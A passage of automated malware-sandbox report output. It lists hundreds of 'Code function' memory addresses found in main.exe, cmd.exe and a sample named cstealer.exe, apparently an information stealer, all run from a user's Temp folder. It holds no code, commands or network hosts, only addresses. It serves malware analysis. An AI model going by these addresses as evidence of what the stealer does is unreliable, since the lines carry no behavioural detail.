                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA3ED04_2_00007FF6D6EA3ED0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB26C44_2_00007FF6D6EB26C4
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA26844_2_00007FF6D6EA2684
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA84BC4_2_00007FF6D6EA84BC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAECA04_2_00007FF6D6EAECA0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA24804_2_00007FF6D6EA2480
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAAC504_2_00007FF6D6EAAC50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAF3204_2_00007FF6D6EAF320
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E992D04_2_00007FF6D6E992D0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA42D44_2_00007FF6D6EA42D4
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA2A944_2_00007FF6D6EA2A94
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB17204_2_00007FF6D6EB1720
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA22744_2_00007FF6D6EA2274
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB4A604_2_00007FF6D6EB4A60
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90F38A85_2_00000230D90F38A8
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90ED0E05_2_00000230D90ED0E0
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90E1F2C5_2_00000230D90E1F2C
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D92244A85_2_00000230D92244A8
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D921DCE05_2_00000230D921DCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D9212B2C5_2_00000230D9212B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E712638A87_2_0000014E712638A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7125D0E07_2_0000014E7125D0E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71251F2C7_2_0000014E71251F2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71282B2C7_2_0000014E71282B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E712944A87_2_0000014E712944A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128DCE07_2_0000014E7128DCE0
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8A8F286108_2_00007FF8A8F28610
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8BA2477188_2_00007FF8BA247718
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E318E09_2_00007FF8A7E318E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBA8C09_2_00007FF8A7DBA8C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA28889_2_00007FF8A7DA2888
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB68009_2_00007FF8A7DB6800
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4F8109_2_00007FF8A7E4F810
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCB7C09_2_00007FF8A7DCB7C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E247809_2_00007FF8A7E24780
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E517709_2_00007FF8A7E51770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBB7709_2_00007FF8A7DBB770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE26809_2_00007FF8A7DE2680
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA665D9_2_00007FF8A7DA665D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA66559_2_00007FF8A7DA6655
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCA6209_2_00007FF8A7DCA620
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E3E5F09_2_00007FF8A7E3E5F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E1F5E09_2_00007FF8A7E1F5E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC45C09_2_00007FF8A7DC45C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCE5A09_2_00007FF8A7DCE5A0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E3F5B09_2_00007FF8A7E3F5B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E505B09_2_00007FF8A7E505B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC55B09_2_00007FF8A7DC55B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E065909_2_00007FF8A7E06590
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCC5409_2_00007FF8A7DCC540
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E314E09_2_00007FF8A7E314E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E5C4D09_2_00007FF8A7E5C4D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E124B09_2_00007FF8A7E124B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAF4B09_2_00007FF8A7DAF4B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E423E09_2_00007FF8A7E423E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E433D09_2_00007FF8A7E433D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E2B3909_2_00007FF8A7E2B390
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAA3709_2_00007FF8A7DAA370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB83709_2_00007FF8A7DB8370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE82709_2_00007FF8A7DE8270
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DAE2209_2_00007FF8A7DAE220
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC21E09_2_00007FF8A7DC21E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E471D09_2_00007FF8A7E471D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4E1D09_2_00007FF8A7E4E1D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA41809_2_00007FF8A7DA4180
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E021609_2_00007FF8A7E02160
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF71509_2_00007FF8A7DF7150
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBB1209_2_00007FF8A7DBB120
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA60F09_2_00007FF8A7DA60F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA30D49_2_00007FF8A7DA30D4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E0F0909_2_00007FF8A7E0F090
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF80209_2_00007FF8A7DF8020
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DCB0009_2_00007FF8A7DCB000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4EFE09_2_00007FF8A7E4EFE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E25FD09_2_00007FF8A7E25FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB4FD09_2_00007FF8A7DB4FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DECF809_2_00007FF8A7DECF80
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E24F909_2_00007FF8A7E24F90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E0BF709_2_00007FF8A7E0BF70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF4F509_2_00007FF8A7DF4F50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E4BF209_2_00007FF8A7E4BF20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DBFF009_2_00007FF8A7DBFF00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DC6E709_2_00007FF8A7DC6E70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA8DC09_2_00007FF8A7DA8DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E17DD09_2_00007FF8A7E17DD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E16DC09_2_00007FF8A7E16DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE6DB09_2_00007FF8A7DE6DB0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DB1D909_2_00007FF8A7DB1D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFDD009_2_00007FF8A7DFDD00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DD9D169_2_00007FF8A7DD9D16
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E27CD09_2_00007FF8A7E27CD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E48C509_2_00007FF8A7E48C50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA3B709_2_00007FF8A7DA3B70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF6B109_2_00007FF8A7DF6B10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFFB109_2_00007FF8A7DFFB10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DA6A629_2_00007FF8A7DA6A62
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DD3A009_2_00007FF8A7DD3A00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7E229E09_2_00007FF8A7E229E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DE49C09_2_00007FF8A7DE49C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DF99809_2_00007FF8A7DF9980
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DEC9409_2_00007FF8A7DEC940
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7DFB9209_2_00007FF8A7DFB920
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7F112E09_2_00007FF8A7F112E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7F118D09_2_00007FF8A7F118D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80323F19_2_00007FF8A80323F1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035D9E9_2_00007FF8A8035D9E
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81D2A909_2_00007FF8A81D2A90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034D049_2_00007FF8A8034D04
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8112B409_2_00007FF8A8112B40
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035B0F9_2_00007FF8A8035B0F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031B229_2_00007FF8A8031B22
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80346339_2_00007FF8A8034633
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80372C09_2_00007FF8A80372C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803213F9_2_00007FF8A803213F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804EF009_2_00007FF8A804EF00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A816B0209_2_00007FF8A816B020
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036EEC9_2_00007FF8A8036EEC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804F0609_2_00007FF8A804F060
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80329CD9_2_00007FF8A80329CD
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81661309_2_00007FF8A8166130
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80334869_2_00007FF8A8033486
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80336939_2_00007FF8A8033693
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031A4B9_2_00007FF8A8031A4B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80370779_2_00007FF8A8037077
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036FFA9_2_00007FF8A8036FFA
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035A609_2_00007FF8A8035A60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031CC19_2_00007FF8A8031CC1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81626709_2_00007FF8A8162670
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034E4E9_2_00007FF8A8034E4E
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80360D79_2_00007FF8A80360D7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035E209_2_00007FF8A8035E20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036A829_2_00007FF8A8036A82
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803655A9_2_00007FF8A803655A
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81D39D09_2_00007FF8A81D39D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81E7A109_2_00007FF8A81E7A10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80341659_2_00007FF8A8034165
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8167AF09_2_00007FF8A8167AF0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80330C19_2_00007FF8A80330C1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80332E79_2_00007FF8A80332E7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80322899_2_00007FF8A8032289
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804BD609_2_00007FF8A804BD60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80327669_2_00007FF8A8032766
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A815FE309_2_00007FF8A815FE30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034C379_2_00007FF8A8034C37
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804BF209_2_00007FF8A804BF20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032E8C9_2_00007FF8A8032E8C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80341019_2_00007FF8A8034101
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036CB79_2_00007FF8A8036CB7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803114F9_2_00007FF8A803114F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A805B1C09_2_00007FF8A805B1C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804F2009_2_00007FF8A804F200
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035D859_2_00007FF8A8035D85
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033B939_2_00007FF8A8033B93
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80351699_2_00007FF8A8035169
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81673109_2_00007FF8A8167310
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A826F4609_2_00007FF8A826F460
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A805B5509_2_00007FF8A805B550
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80370459_2_00007FF8A8037045
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031EA19_2_00007FF8A8031EA1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036F239_2_00007FF8A8036F23
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A809F7009_2_00007FF8A809F700
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80322E89_2_00007FF8A80322E8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80321B79_2_00007FF8A80321B7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803609B9_2_00007FF8A803609B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033FDA9_2_00007FF8A8033FDA
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80311CC9_2_00007FF8A80311CC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036D579_2_00007FF8A8036D57
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032FCC9_2_00007FF8A8032FCC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81E4A109_2_00007FF8A81E4A10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034C149_2_00007FF8A8034C14
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034A549_2_00007FF8A8034A54
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80326E99_2_00007FF8A80326E9
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803592F9_2_00007FF8A803592F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80322FC9_2_00007FF8A80322FC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80311409_2_00007FF8A8031140
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80312179_2_00007FF8A8031217
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80310AA9_2_00007FF8A80310AA
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031F969_2_00007FF8A8031F96
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036EBA9_2_00007FF8A8036EBA
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803659B9_2_00007FF8A803659B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80344039_2_00007FF8A8034403
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803362F9_2_00007FF8A803362F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803144C9_2_00007FF8A803144C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80331899_2_00007FF8A8033189
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A815CF909_2_00007FF8A815CF90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8170F909_2_00007FF8A8170F90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80371089_2_00007FF8A8037108
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81701209_2_00007FF8A8170120
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035B739_2_00007FF8A8035B73
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80314249_2_00007FF8A8031424
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032C759_2_00007FF8A8032C75
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81E82E09_2_00007FF8A81E82E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80E04409_2_00007FF8A80E0440
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804C4809_2_00007FF8A804C480
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80325EF9_2_00007FF8A80325EF
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80369E29_2_00007FF8A80369E2
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A815C5F09_2_00007FF8A815C5F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A804C6209_2_00007FF8A804C620
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803177B9_2_00007FF8A803177B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8036C1C9_2_00007FF8A8036C1C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80322AC9_2_00007FF8A80322AC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8034B569_2_00007FF8A8034B56
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803275C9_2_00007FF8A803275C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032D749_2_00007FF8A8032D74
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81D19209_2_00007FF8A81D1920
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80359F79_2_00007FF8A80359F7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81E99E09_2_00007FF8A81E99E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033A859_2_00007FF8A8033A85
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80350AB9_2_00007FF8A80350AB
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031CFD9_2_00007FF8A8031CFD
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80372529_2_00007FF8A8037252
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80338329_2_00007FF8A8033832
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80335FD9_2_00007FF8A80335FD
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803266C9_2_00007FF8A803266C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80329829_2_00007FF8A8032982
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8032D0B9_2_00007FF8A8032D0B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80372A79_2_00007FF8A80372A7
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8033BA29_2_00007FF8A8033BA2
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80316229_2_00007FF8A8031622
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80373659_2_00007FF8A8037365
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031D839_2_00007FF8A8031D83
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8165E309_2_00007FF8A8165E30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80347469_2_00007FF8A8034746
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803378D9_2_00007FF8A803378D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80343599_2_00007FF8A8034359
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8031B319_2_00007FF8A8031B31
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80357D19_2_00007FF8A80357D1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80368C59_2_00007FF8A80368C5
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035BF09_2_00007FF8A8035BF0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80552009_2_00007FF8A8055200
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A81E92109_2_00007FF8A81E9210
